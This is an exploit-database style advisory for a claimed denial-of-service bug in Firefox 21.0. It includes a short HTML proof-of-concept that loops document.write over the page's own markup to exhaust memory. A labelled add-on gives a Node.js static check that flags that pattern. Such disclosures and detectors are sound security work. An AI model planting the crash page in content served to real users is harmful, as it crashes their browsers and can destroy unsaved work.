Mozilla Firefox 21.0 Denial Of Service



EKU-ID: 3314 CVE: OSVDB-ID:
Author: Jigsaw Published: 2013-06-24 Verified: Verified


Title : Mozilla Firefox Browser 21.0 Remote Denial Of Service 
Author : Jigsaw (Abdelmorite Eljoaydi)
Date : 22-06-2013
E-mail : jigsaw0658@gmail.com
Home : Morocco
Facebook page : facebook.com/abdelmorit.alma
platform : software
Impact : Denial Of Service (all tabs are no longer accessible; your work might be lost)
Tested on : Mozilla Firefox 21.0 (the latest release)
OS : Tested on Windows 7 / Windows XP
Risk : Low[+] / Medium[-]


===========================================================================================
#Vulnerability:

This bug is a typical result of an endless dialog loop.
The flaw is triggered when the attacker puts document.write(document.body.innerHTML)
inside a loop with many iterations, which leaves the browser unable to handle the resulting exception and drives it into an out-of-memory condition.
User interaction is required to exploit this vulnerability, in that the target must visit a malicious web page.

============================================================================================
#Proof of Concept:

<html>
<body>
<script>
document.write("")
</script>
</body>
<script>
var i=0;
for (i=0;i<=99;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>
</html>
================================================================================================
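Added example, not part of the original advisory: a heuristic static check, written for Node.js, that flags inline scripts calling document.write() with innerHTML inside a for/while loop, the pattern described above. The function names and both sample pages are constructed for illustration, and the check matches only this literal pattern.

```javascript
// Constructed sample mirroring the advisory's loop pattern; scanned as text, never executed.
const SAMPLE_PAGE = `<html><body><script>document.write("")</script></body><script>
var i=0;
for (i=0;i<=99;i++)
{ document.write(document.body.innerHTML); }
</script></html>`;
// Constructed benign page: writes literals in a loop, reads innerHTML outside it.
const BENIGN_PAGE = `<html><body><script>
for (var i = 0; i < 3; i++) { document.write("<li>item " + i + "</li>"); }
document.title = document.body.innerHTML.length;
</script></body></html>`;

// Text of every inline <script> element in an HTML string.
function extractScripts(html) {
  return [...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi)].map(m => m[1]);
}

// Index just past the closer that matches the opener located at src[start - 1].
function skipBalanced(src, start, open, close) {
  let depth = 1, i = start;
  for (; i < src.length && depth > 0; i++) {
    if (src[i] === open) depth++;
    else if (src[i] === close) depth--;
  }
  return i;
}

// Body of each for/while loop: a braced block, or the single statement that follows.
function loopBodies(src) {
  const bodies = [], re = /\b(?:for|while)\s*\(/g;
  while (re.exec(src) !== null) {
    let i = skipBalanced(src, re.lastIndex, "(", ")");   // skip the loop header
    while (/\s/.test(src[i] || "")) i++;
    if (src[i] === "{") bodies.push(src.slice(i + 1, skipBalanced(src, i + 1, "{", "}") - 1));
    else bodies.push(src.slice(i, src.indexOf(";", i) + 1 || src.length));
  }
  return bodies;
}

// document.write()/writeln() whose argument reads innerHTML back from the document.
const AMPLIFY = /document\s*\.\s*write(?:ln)?\s*\([^)]*\binnerHTML\b/;

// One hit per loop body that feeds the page's own markup back into document.write().
function findSelfAmplifyingWrites(html) {
  return extractScripts(html).flatMap((src, script) =>
    loopBodies(src).filter(b => AMPLIFY.test(b)).map(b => ({ script, loopBody: b.trim() })));
}
```

A hit is a reason to review the page by hand, not proof of a crash condition; do...while loops and external scripts are outside what this check reads.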